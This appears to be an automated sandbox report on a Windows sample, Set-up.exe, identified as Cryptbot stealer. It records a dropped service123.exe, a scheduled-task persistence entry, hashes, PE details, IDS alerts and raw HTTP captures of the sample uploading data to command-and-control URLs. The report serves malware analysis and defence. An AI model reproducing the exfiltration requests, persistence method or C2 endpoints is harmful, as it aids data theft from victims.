Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Set-up.exe, PID 7652 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Set-up.exe

Simulations

Behavior and APIs

Time	Type	Description
09:48:13	API Interceptor	3x Sleep call for process: Set-up.exe modified
09:49:39	API Interceptor	510x Sleep call for process: service123.exe modified
14:49:06	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.244.181.140	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twelvevh12pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	elevenvh11pt.top/v1/upload.php
	S#U0435tup.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twelvevh12pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twelvevh12pt.top/v1/upload.php
	S#U0435tup.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twelvevh12pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	twelvevh12ht.top/v1/upload.php
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	thirtvf13sr.top/v1/upload.php
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	thirtvf13vt.top/v1/upload.php
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	thirtvf13vt.top/v1/upload.php
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fivevh5vs.top/v1/upload.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BELCLOUDBG	Printable_Copy.js	Get hash	malicious	Unknown	Browse	185.203.118.205
	Printable_Copy.js	Get hash	malicious	Unknown	Browse	185.203.118.205
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	S#U0435tup.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	file.exe	Get hash	malicious	LummaC, Clipboard Hijacker, Cryptbot, LummaC Stealer, Neoreklami, Socks5Systemz	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	S#U0435tup.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	file.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140

Process:	C:\Users\user\Desktop\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315803136
Entropy (8bit):	0.05437844090555279
Encrypted:	false
SSDEEP:	24576:fmZBOBm/NEVpgdn8dIpfXXHgw/GddSWknpmkPPOXnRbl:24wuKWkn3P2XRR
MD5:	A938E1B9680E1B27C80144D73924DCAD
SHA1:	778141A0A97726A8B1BEC17E3B6538094ACAF981
SHA-256:	852517CC0765FA025AC6AACB337FCEC64B3CA47D01F398C50079B235259D7783
SHA-512:	BA9CEB08AD538284A2FD50AAD0FAA1083B1E066BEEBE205D0292ACAB25ACDA1CED57C5180E18E35DFA5DE6B472309E78AAAA27EBEC34E8C8C12AA791F7261A5E
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...fu.f...........#...(...........................j.........................@............@... .........................`.......................................@z...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..@z.......\|...J..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\Desktop\Set-up.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.0023405119908208173
Encrypted:	false
SSDEEP:
MD5:	3FFF09206AC36D06CF8352458CA5573E
SHA1:	E1404DCC969A48FD0BE3A0A1908498FE6798FF52
SHA-256:	64206BD3E37650D52E61472A6A7BCC142AD36E39FFA08ACE700B0A7A3FCD0842
SHA-512:	84836A39E8940A9A26334AE47232C0BBFA530B41CE03F285BF5754345B527DA070685F858DCC54AEBA80339DD361A8C392AD62FB8D2323F6231D707936591182
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[u.f...............(.v........................@.......................... .......}....@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	2.7973553454084135
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-up.exe
File size:	10'006'016 bytes
MD5:	bb85c40120dac356bfc311f4774d3439
SHA1:	bdcc094a88aa8971753da0c86e05c68578e5ce84
SHA256:	cff579e5facdd493e0b023979049f4504ffc611c352a7d97928943e61c66dd0d
SHA512:	d15e22befdcc9de94b68552e87d3175694e5d70cc4577d9916a523e34bbaee65991730fe71cc4075561c7247ff8d8e7126ce1b4a7f795d2fa3c7276604a32e05
SSDEEP:	49152:G+ACxZPpFDaaekodusejnK99nJeO+3nXn0Ext9V6qrzDTAQg0JZ+Wm+vfYM8sF1K:G+zxZxhUkIeG
TLSH:	C7A6D662DD8B91FDE19309B8A206B37F1634EB05885ECA78DF44E7D1DB3193CD8AA015
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....z.f...............(.v,...................,...@..........................0............@... .........................B..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x66FB7AFC [Tue Oct 1 04:30:52 2024 UTC]
TLS Callbacks:	0x401800, 0x4017b0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	208ad2c8c137e3d4c33022e4bb87e9bb

Entrypoint Preview

Instruction
mov dword ptr [00D49070h], 00000001h
jmp 00007FBCCCEF8F56h
nop
mov dword ptr [00D49070h], 00000000h
jmp 00007FBCCCEF8F46h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007FBCCCF07656h
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 00D3B000h
call dword ptr [00D4B22Ch]
sub esp, 04h
test eax, eax
je 00007FBCCCEF9315h
mov ebx, eax
mov dword ptr [esp], 00D3B000h
call dword ptr [00D4B24Ch]
mov edi, dword ptr [00D4B234h]
sub esp, 04h
mov dword ptr [00D49028h], eax
mov dword ptr [esp+04h], 00D3B013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 00D3B029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [006C9004h], eax
test esi, esi
je 00007FBCCCEF92B3h
mov dword ptr [esp+04h], 00D4902Ch
mov dword ptr [esp], 00D46104h
call esi
mov dword ptr [esp], 00401580h
call 00007FBCCCEF9203h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x94a000	0x42	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x94b000	0xa98	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x94e000	0x448b8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x9440a4	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x94b20c	0x1a8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2c74c8	0x2c7600	5c8f8999542e4ddf406643e1f59f90c1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x2c9000	0x671260	0x671400	31fdcac9acd61653d985cd40eaff9c6d	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x93b000	0xa1d4	0xa200	1c91ee88f7c44e8ba45fd0a38cb35837	False	0.3831741898148148	data	4.497560622590229	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x946000	0x21d8	0x2200	c008ed1b5e0f99ee4732fc4fca3a3a3e	False	0.32479319852941174	data	4.858647436421049	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x949000	0xb74	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x94a000	0x42	0x200	88a4ba15a7a668356b836b170cce16a4	False	0.123046875	data	0.7272198426899718	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x94b000	0xa98	0xc00	3f33a80ee5117f0d83e242bb2e607df0	False	0.3824869791666667	data	4.8290174211678485	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x94c000	0x30	0x200	947565758601e59a9e2e145caaaaefe2	False	0.064453125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x94d000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x94e000	0x448b8	0x44a00	fb512341c9dc7418af07352204ae4185	False	0.1709927140255009	data	6.63948823942024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetStartupInfoA, GetTempPathA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery, WideCharToMultiByte, lstrlenA
msvcrt.dll	__getmainargs, __initenv, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _assert, _cexit, _errno, _chsize, _exit, _filelengthi64, _fileno, _initterm, _iob, _lock, _onexit, _unlock, abort, atoi, calloc, exit, fclose, fflush, fgetpos, fopen, fputc, fread, free, freopen, fsetpos, fwrite, getc, islower, isspace, isupper, isxdigit, localeconv, malloc, memcmp, memcpy, memmove, memset, mktime, localtime, difftime, _mkdir, perror, puts, realloc, remove, setlocale, signal, strchr, strcmp, strerror, strlen, strncmp, strncpy, strtol, strtoul, tolower, ungetc, vfprintf, time, wcslen, wcstombs, _stat, _write, _utime, _open, _fileno, _close, _chmod
SHELL32.dll	ShellExecuteA

Exports

Name	Ordinal	Address
main	1	0x5b3b70

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-01T15:48:14.004848+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.9	49706	185.244.181.140	80	TCP
2024-10-01T15:48:17.498990+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.9	49708	185.244.181.140	80	TCP
2024-10-01T15:48:22.466721+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.9	49709	185.244.181.140	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 15:48:13.234570980 CEST	49706	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:13.239479065 CEST	80	49706	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:13.239587069 CEST	49706	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:13.239816904 CEST	49706	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:13.239841938 CEST	49706	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:13.244694948 CEST	80	49706	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:13.244707108 CEST	80	49706	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:14.004250050 CEST	80	49706	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:14.004793882 CEST	80	49706	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:14.004848003 CEST	49706	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:14.006697893 CEST	49706	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:14.011461020 CEST	80	49706	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.442063093 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.447079897 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.447173119 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.447341919 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.447443962 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.452138901 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.452194929 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.452339888 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.452380896 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.452390909 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.452394962 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.452404022 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.452421904 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.452450037 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.452550888 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.452562094 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.452579975 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.452620983 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.452630997 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.452682972 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.452704906 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.452804089 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.457082987 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.457138062 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.457169056 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.457205057 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.457215071 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.457216978 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.457257986 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.457298040 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.457345009 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.457468033 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.457511902 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.498852015 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.498990059 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.550709009 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.550893068 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.598690987 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.598772049 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.646672010 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.646730900 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.694717884 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.696685076 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.746747971 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.748729944 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:17.798711061 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:17.958550930 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:18.457456112 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:18.457653999 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:18.457663059 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:18.457710981 CEST	49708	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:18.462537050 CEST	80	49708	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.646145105 CEST	49709	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:21.651038885 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.651179075 CEST	49709	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:21.651643038 CEST	49709	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:21.651741028 CEST	49709	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:21.656816959 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.656845093 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.656886101 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.656894922 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.656898022 CEST	49709	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:21.656929016 CEST	49709	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:21.656944990 CEST	49709	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:21.656955957 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.656985044 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.656994104 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.657002926 CEST	49709	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:21.657040119 CEST	49709	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:21.657041073 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.657069921 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.657079935 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.657083035 CEST	49709	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:21.657104015 CEST	49709	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:21.657130957 CEST	49709	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:21.661837101 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.661895037 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.661914110 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.662024975 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.662072897 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.662117958 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.662255049 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:21.702708960 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:22.466562033 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:22.466721058 CEST	49709	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:22.466731071 CEST	80	49709	185.244.181.140	192.168.2.9
Oct 1, 2024 15:48:22.466783047 CEST	49709	80	192.168.2.9	185.244.181.140
Oct 1, 2024 15:48:22.471759081 CEST	80	49709	185.244.181.140	192.168.2.9

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 15:48:12.742810965 CEST	52148	53	192.168.2.9	1.1.1.1
Oct 1, 2024 15:48:13.229195118 CEST	53	52148	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 1, 2024 15:48:12.742810965 CEST	192.168.2.9	1.1.1.1	0xbba8	Standard query (0)	elevenvx11pn.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 1, 2024 15:48:13.229195118 CEST	1.1.1.1	192.168.2.9	0xbba8	No error (0)	elevenvx11pn.top		185.244.181.140	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

elevenvx11pn.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49706	185.244.181.140	80	7652	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:48:13.239816904 CEST	335	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary71095901 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 413 Host: elevenvx11pn.top
Oct 1, 2024 15:48:13.239841938 CEST	413	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 37 31 30 39 35 39 30 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4e 75 64 Data Ascii: ------Boundary71095901Content-Disposition: form-data; name="file"; filename="Nudibetay.bin"Content-Type: application/octet-stream!C??WkanPM1-1w;Zl7{cEMg[0]-P e0yK%=#(y&n
Oct 1, 2024 15:48:14.004250050 CEST	209	IN	HTTP/1.1 200 OK Server: nginx/1.24.0 (Ubuntu) Date: Tue, 01 Oct 2024 13:48:13 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 2 Connection: close ETag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc" Data Raw: 4f 4b Data Ascii: OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49708	185.244.181.140	80	7652	C:\Users\user\Desktop\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 15:48:17.447341919 CEST	337	OUT	POST /v1/upload.php HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: multipart/form-data; boundary=----Boundary18234966 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Content-Length: 90016 Host: elevenvx11pn.top
Oct 1, 2024 15:48:17.447443962 CEST	11124	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 6f 75 6e 64 61 72 79 31 38 32 33 34 39 36 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4e 65 78 Data Ascii: ------Boundary18234966Content-Disposition: form-data; name="file"; filename="Nexezezi.bin"Content-Type: application/octet-streamWXe) NUW]P"kd0KL\|Od940::cfo(G[]Z{q5w[M
Oct 1, 2024 15:48:17.452194929 CEST	1236	OUT	Data Raw: 7b 85 b8 8d 0e ac d8 dd 71 db 1a 17 e8 02 c2 68 97 54 f0 3c d5 19 61 97 67 47 bf 6a 27 7e 72 74 a9 f9 1a b6 29 9c 7b 05 4f e0 d9 78 0b d0 44 df 42 6c 9d 8c 7c 62 c9 32 bf d4 5e c4 b4 23 5f c7 cc a5 54 e0 c0 9f 39 6d 0c 12 8d e4 c4 8b 51 c8 53 6a Data Ascii: {qhT<agGj'~rt){OxDBl\|b2^#_T9mQSj}Kk/(E\|v6Ukt'<)D^n+RJWqtGt)>,!z9Rh;`}Diue]jd$@G"xtZI,x/Dg3IWS'!uuh]WW*
Oct 1, 2024 15:48:17.452394962 CEST	2472	OUT	Data Raw: 80 6f 37 ea 37 3d 30 cc f6 09 ba 88 5e b5 95 df 0f 91 54 7e a8 45 da 99 76 b4 fc 09 b5 71 4d bb 5c f4 9b 62 74 61 b8 e7 8e 5d 3c 03 f6 80 85 c6 27 a7 1a a0 93 69 40 0f 02 fe 60 a1 67 33 a5 45 ac 57 80 50 02 d3 c8 30 89 61 03 bd 11 5e 83 e6 d9 dd Data Ascii: o77=0^T~EvqM\bta]<'i@`g3EWP0a^c]$e;S!/$_'"WsymM+Q6)<tE'br]U+@`OVE{J!6Sc\|KW}Gs<R6P]l5t6ON/},)2T\|V?}ae
Oct 1, 2024 15:48:17.452421904 CEST	2472	OUT	Data Raw: a8 3f e4 d2 95 fe 0a cb fd f7 b8 4b 45 ee af ea c0 19 9f 12 52 9a d1 61 7f c0 bb 55 42 d8 3a 3f 79 88 2b 0e 73 ab b1 9a cc c3 92 11 a4 a9 65 7d fa 89 2c 1e 44 f7 fb a1 49 a2 ca 01 d8 8e 4f 82 05 fc 78 d1 0b 56 b0 4c 3e 5a a7 a1 90 20 b9 61 26 f0 Data Ascii: ?KERaUB:?y+se},DIOxVL>Z a&'E'Q4my/2ricIq_vYP5kk.+!@,J).)\|IW"Fk]{9.=[QiYFaJ5ibveD(}#Xz6fToQ R`<lq`,h/g
